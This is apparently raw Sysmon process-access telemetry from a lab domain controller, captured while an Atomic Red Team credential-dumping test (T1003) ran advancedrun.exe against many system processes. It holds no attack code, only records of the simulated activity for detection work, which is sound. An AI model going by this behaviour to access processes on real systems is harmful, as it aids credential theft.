.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967504Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967500Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967499Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967498Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967495Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967494Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967493Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967492Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003967487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
